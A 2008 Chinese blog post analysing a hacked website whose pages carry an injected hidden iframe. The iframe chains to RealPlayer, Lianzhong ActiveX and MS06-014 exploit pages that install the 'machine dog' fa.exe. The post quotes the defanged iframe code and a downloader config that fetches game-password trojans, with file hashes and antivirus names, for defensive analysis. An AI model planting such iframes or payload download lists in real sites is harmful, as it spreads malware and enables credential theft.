一个利用real,联众游戏程序漏洞,MS06-014传播机器狗/fa.exe的网站
来源:互联网 发布:时时彩组三预测软件 编辑:程序博客网 时间:2024/06/01 09:25
一个利用real,联众游戏程序漏洞,MS06-014传播机器狗/fa.exe的网站
endurer 原创
2008-02-13 第1版
一位网友反映说他所管理的网站出了问题,打开任一网页,杀毒软件就报病毒。
检查该网站的网代码,发现:
/---
<iframe src=hxxp://xxx.hu*i**la**ib*a*.info/104.htm width=100 height=0></iframe>
---/
1 hxxp://xxx.hu*i**la**ib*a*.info/104.htm
包含代码:
/---
<iframe width=100 height=1 frameborder=0 scrolling=no src="c**e*shi**/real.htm"></iframe>
<iframe width=100 height=1 frameborder=0 scrolling=no src="c**e*shi**/lz.htm"></iframe>
<iframe width=100 height=1 frameborder=0 scrolling=no src="c**e*shi**/614.htm"></iframe>
---/
1.1 hxxp://xxx.hu*i**la**ib*a*.info/c**e*shi**/real.htm
利用realplayer漏洞下载:hxxp://xxx.hu*i**la**ib*a*.info/ww/fa.exe
文件说明符 : D:/test/fa.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 16:5:39
修改时间 : 2008-2-13 16:5:40
访问时间 : 2008-2-13 16:6:58
大小 : 12552 字节 12.264 KB
MD5 : 6b0871a3aa90420f839ce5eecd1ddf94
SHA1: 674E363647AD7AB93176ECA70A33FBFCFC355C3D
CRC32: 3e6d13ca
会释放驱动 drivers/pcihdd2.sys,文件TIMPlatform.exe、userinit.exe。并根据hxxp://a**a*a.hu*i**la**ib*a*.info/c**e*shi**/fa.txt下载新版本:
/---
[CONTROL]
VERSION=2008-2-9
[DOWN]
NEWVERSION=hxxp://xxx.hu*i**la**ib*a*.info/c**e*shi**/gx.exe
1=hxxp://xxx.hu*i**la**ib*a*.info/ww/11.exe
2=hxxp://xxx.hu*i**la**ib*a*.info/ww/12.exe
3=hxxp://xxx.hu*i**la**ib*a*.info/ww/13.exe
4=hxxp://xxx.hu*i**la**ib*a*.info/ww/14.exe
5=hxxp://xxx.hu*i**la**ib*a*.info/ww/15.exe
6=hxxp://xxx.hu*i**la**ib*a*.info/ww/16.exe
7=hxxp://xxx.hu*i**la**ib*a*.info/ww/17.exe
8=hxxp://xxx.hu*i**la**ib*a*.info/ww/18.exe
9=hxxp://xxx.hu*i**la**ib*a*.info/ww/19.exe
10=hxxp://xxx.hu*i**la**ib*a*.info/ww/20.exe
11=hxxp://*60.190.216.*12/ww/21.exe
12=hxxp://*60.190.216.*12/ww/22.exe
13=hxxp://*60.190.216.*12/ww/23.exe
14=hxxp://*60.190.216.*12/ww/24.exe
15=hxxp://*60.190.216.*12/ww/25.exe
16=hxxp://*60.190.216.*12/ww/26.exe
17=hxxp://*60.190.216.*12/ww/27.exe
18=hxxp://*60.190.216.*12/ww/28.exe
19=hxxp://*60.190.216.*12/ww/29.exe
20=hxxp://*60.190.216.*12/ww/30.exe
21=hxxp://*60.190.216.*12/ww/31.exe
22=hxxp://*60.190.216.*12/ww/32.exe
23=hxxp://*60.190.216.*12/ww/33.exe
---/
文件说明符 : D:/test/11.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:6:50
修改时间 : 2008-2-13 18:6:50
访问时间 : 2008-2-13 17:38:47
大小 : 24504 字节 23.952 KB
MD5 : 0954e96e6874639c9289683739588b71
SHA1: C01933808D2C9A8B94228A22983ACC63BB0A7197
CRC32: 8d044e32
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qiv,瑞星报为 Trojan.PSW.Win32.GamesOnline.mn
文件说明符 : D:/test/12.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:7:32
修改时间 : 2008-2-13 18:7:36
访问时间 : 2008-2-13 18:7:44
大小 : 18336 字节 17.928 KB
MD5 : 69a4ce8ebf88e7124fb62b93f11e0d41
SHA1: D8E092C49AE3D463DA35CC89489A806A26CDFB94
CRC32: e2794881
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qnk,瑞星报为 Trojan.PSW.Win32.GameOL.lvx
文件说明符 : D:/test/13.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:9:2
修改时间 : 2008-2-13 18:9:2
访问时间 : 2008-2-13 18:9:38
大小 : 18452 字节 18.20 KB
MD5 : 301ee0fc94f9270ba5147bec7fd531fc
SHA1: DECE439E84488AAF869AB32E41149B9D825C7CFA
CRC32: 9e59252d
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qiv,瑞星报为 Trojan.PSW.Win32.GamesOnline.mn
文件说明符 : D:/test/14.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:10:17
修改时间 : 2008-2-13 18:10:17
访问时间 : 2008-2-13 18:10:22
大小 : 21360 字节 20.880 KB
MD5 : cb6969b4a466e04377efcc05e52dd9f9
SHA1: 52CB364E57BB2C568E8A463E070C8DD3EFF49352
CRC32: e0612093
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qiv,瑞星报为 Trojan.PSW.Win32.GamesOnline.mn
文件说明符 : D:/test/15.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:12:23
修改时间 : 2008-2-13 18:12:23
访问时间 : 2008-2-13 18:12:31
大小 : 19300 字节 18.868 KB
MD5 : ab7b502fd6c1275535d3a5c0f76cc077
SHA1: 74539522121111409C34CB0C44823677CC6A7FB2
CRC32: 1f9cd601
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qoz
文件说明符 : D:/test/16.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:18:8
修改时间 : 2008-2-13 18:18:8
访问时间 : 2008-2-13 17:54:51
大小 : 23332 字节 22.804 KB
MD5 : 7fe3e49f7aa21370ad5b9903d2878c5e
SHA1: 2F36391D16289795F49119D2239C4AD60495BD28
CRC32: bf616978
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.pud,瑞星报为 Trojan.PSW.Win32.ZhengTu.ymy
文件说明符 : D:/test/17.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:19:28
修改时间 : 2008-2-13 18:19:28
访问时间 : 2008-2-13 18:19:33
大小 : 18584 字节 18.152 KB
MD5 : be28d24eaaf864f34733629bfb1036d7
SHA1: ECD109C09DB6F79B0C33BDE07499129A19245609
CRC32: b548febf
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qiv,瑞星报为 Trojan.PSW.Win32.GamesOnline.mn
文件说明符 : D:/test/18.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:21:7
修改时间 : 2008-2-13 18:21:7
访问时间 : 2008-2-13 18:21:8
大小 : 19304 字节 18.872 KB
MD5 : fc46949ddab4837377bdef45dae888d9
SHA1: 2357A48E60BA86B6E23C0F20EC12210CF34C9171
CRC32: bd7433c4
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qoz
文件说明符 : D:/test/19.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:22:13
修改时间 : 2008-2-13 18:22:13
访问时间 : 2008-2-13 18:24:8
大小 : 18824 字节 18.392 KB
MD5 : 5d8bb087e788dc90919763f59231e5f5
SHA1: B3B0C97715B6B431BFB904A783E360616CD9C4A5
CRC32: d6a01f42
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qnk,瑞星报为 Trojan.PSW.Win32.GameOL.lvx
文件说明符 : D:/test/20.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:22:19
修改时间 : 2008-2-13 18:22:17
访问时间 : 2008-2-13 18:24:8
大小 : 17956 字节 17.548 KB
MD5 : 3d779c93f9a1dbd6ec5ade69e58f5add
SHA1: 9953662B42072B5AE2264703B54604859B186552
CRC32: ecadcb14
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.pry,瑞星报为 Trojan.PSW.Win32.XYOnline.abc
文件说明符 : D:/test/21.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:22:26
修改时间 : 2008-2-13 18:22:26
访问时间 : 2008-2-13 18:24:8
大小 : 18620 字节 18.188 KB
MD5 : 9bc243e13c042d66da1e69fa1f400f00
SHA1: A02192990F35A7ACC14579D995D5455A02D0F6C0
CRC32: ee76c082
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qoz,瑞星报为 Trojan.PSW.Win32.GameOL.lvx
文件说明符 : D:/test/22.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:22:33
修改时间 : 2008-2-13 18:22:33
访问时间 : 2008-2-13 18:24:8
大小 : 23232 字节 22.704 KB
MD5 : 2993d90fc8edb81a133aebe91fa5c877
SHA1: 296B205C710AD4EC7261B4C5E5C522029D283269
CRC32: 681deef5
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.pzl,瑞星报为 Trojan.PSW.Win32.GamesOnline.mh
文件说明符 : D:/test/23.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:22:39
修改时间 : 2008-2-13 18:22:39
访问时间 : 2008-2-13 18:24:8
大小 : 18088 字节 17.680 KB
MD5 : 733f4e26662dd77474dc3196e8e8e01e
SHA1: 176DA1B70A64C055D6925E30B9C82C7267927204
CRC32: fdf8cc50
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.pzl,瑞星报为 Trojan.PSW.Win32.GamesOnline.mh
文件说明符 : D:/test/24.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:22:46
修改时间 : 2008-2-13 18:22:46
访问时间 : 2008-2-13 18:24:8
大小 : 18248 字节 17.840 KB
MD5 : 8f8280b117acf67defc518a8d18bf121
SHA1: FE10A12370B50A2DB3C445839C52520C340F5A45
CRC32: 794cffd6
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.qoz
文件说明符 : D:/test/25.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:22:50
修改时间 : 2008-2-13 18:22:50
访问时间 : 2008-2-13 18:24:8
大小 : 18836 字节 18.404 KB
MD5 : 4ba3bb2166514167e494be187dc3d8b1
SHA1: 8CE2F7365F7C2582684366365CE0F90BB90EC65F
CRC32: 35a1969f
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.pbp,瑞星报为 Trojan.PSW.Win32.GamesOnline.mn
文件说明符 : D:/test/26.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:22:56
修改时间 : 2008-2-13 18:22:56
访问时间 : 2008-2-13 18:24:8
大小 : 19248 字节 18.816 KB
MD5 : e29465bdf544cc5f1db866a578d66c89
SHA1: 3296C45E6CF45151A4E07D24CEF7BB9585507DCA
CRC32: da8a4f3b
Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.pzl,瑞星报为 Trojan.PSW.Win32.GamesOnline.mh
文件说明符 : D:/test/27.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:23:0
修改时间 : 2008-2-13 18:23:1
访问时间 : 2008-2-13 18:24:8
大小 : 18281 字节 17.873 KB
MD5 : 5d0fb9ad3308914702951a7747b9ab15
SHA1: 774B1B79B1C103814BB09469EEE53B3EBF0D0AFE
CRC32: a330465d
Kaspersky 报为 Trojan.Win32.Agent.fey
文件说明符 : D:/test/28.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:23:6
修改时间 : 2008-2-13 18:23:6
访问时间 : 2008-2-13 18:24:8
大小 : 17351 字节 16.967 KB
MD5 : 2175ee2c7d73838c569c577cbc9d9096
SHA1: 942DC4628F37A7AD22AFE19E3EB8886743580241
CRC32: b1c8ac52
Kaspersky 报为 Trojan.Win32.Agent.fey
文件说明符 : D:/test/29.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:23:12
修改时间 : 2008-2-13 18:23:12
访问时间 : 2008-2-13 18:24:8
大小 : 18389 字节 17.981 KB
MD5 : cc20a85b4d0ea3aebac4e2ee9a850bda
SHA1: 3090C59C29297A6D9DD4032884D4F6F2D3F3CDEB
CRC32: af2f454e
Kaspersky 报为 Trojan.Win32.Agent.fey
文件说明符 : D:/test/30.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:23:18
修改时间 : 2008-2-13 18:23:18
访问时间 : 2008-2-13 18:24:8
大小 : 17832 字节 17.424 KB
MD5 : 98ac9873f6e6bbb33ddc9f2bedb8835d
SHA1: 44ACB3221214716E6E71FA2FE498FAECCE45AF22
CRC32: 198b88a2
Kaspersky 报为 Trojan.Win32.Agent.fey
文件说明符 : D:/test/31.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:23:25
修改时间 : 2008-2-13 18:23:25
访问时间 : 2008-2-13 18:24:8
大小 : 17548 字节 17.140 KB
MD5 : 014124061ebe4e646fe9956e7e6f232f
SHA1: 83E1B7111F5AAC7EB6799070FAD18DEF5DDC3A98
CRC32: 2c4fecba
Kaspersky 报为 Trojan.Win32.Agent.fey
文件说明符 : D:/test/32.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-2-13 18:23:32
修改时间 : 2008-2-13 18:23:32
访问时间 : 2008-2-13 18:24:8
大小 : 17800 字节 17.392 KB
MD5 : 29dae875fb311512c920ff9500d40abd
SHA1: 321894C94561174105F40BF947CE4CD2569F31F0
CRC32: 8f7ace0e
Kaspersky 报为 Trojan.Win32.Agent.fey
1.2 hxxp://xxx.hu*i**la**ib*a*.info/c**e*shi**/lz.htm
输出代码:
/---
<iframe width=50 height=1 src=lz1.htm></iframe>
---/
1.2.1 hxxp://xxx.hu*i**la**ib*a*.info/c**e*shi**/lz1.htm
利用 联众世界GLWorld HanGamePluginCn18类ActiveX控件栈溢出漏洞 下载:hxxp://xxx.hu*i**la**ib*a*.info/ww/fa.exe
参考:http://www.nsfocus.net/vulndb/11465
1.3 hxxp://xxx.hu*i**la**ib*a*.info/c**e*shi**/614.htm
利用 MS06-014: msadco.dll 严重漏洞 下载:hxxp://xxx.hu*i**la**ib*a*.info/ww/fa.exe
- 一个利用real,联众游戏程序漏洞,MS06-014传播机器狗/fa.exe的网站
- 一个利用“永恒之蓝”漏洞传播的挖矿程序分析
- shop363网站程序漏洞利用
- 某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
- 利用迅雷和MS06014漏洞传播Worm.Win32.Agent.a的电子书网站
- MS06-030漏洞分析
- 某网站挂Trojan-Downloader.SWF.Small利用flash漏洞传播Trojan-Downloader.Win32.Small
- 入侵网站的各种漏洞的利用
- 入侵网站的各种漏洞的利用
- MS06-040漏洞分析回顾
- 利用HTTP协议和IE的漏洞在其他计算机上运行一个程序
- 利用HTTP协议和IE的漏洞在其他计算机上运行一个程序
- 一个专爆漏洞的网站
- 一个强大的漏洞公告网站
- 某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码
- 某论坛新游试玩区被植入利用ANI漏洞传播 Trojan.Mnless.kip 的代码
- 使用AutoIt批量自动登录联众游戏的代码
- 利用shutdown.exe作的自动关机程序
- oracle访问参数文件的顺序
- Oracle listener侦听问题
- 解决RichViewEdit乱码问题
- 世界编程大赛第一名——OMNISCENT
- FreeBSD自动启动FTP服务
- 一个利用real,联众游戏程序漏洞,MS06-014传播机器狗/fa.exe的网站
- Oracle学习笔记(存储结构/内存结构/逻辑结构)
- C++ 虚函数表解析
- Oracle表空间、用户建立SQL
- NS tcl-debug problem fixed(1)
- NS tcl-debug problem fixed(2)
- 离开我写第一篇PB博文居然已经过去两年多了
- 内存泄漏之一,看到的是你想不到的。(C++Builder 6)
- Oracle导入数据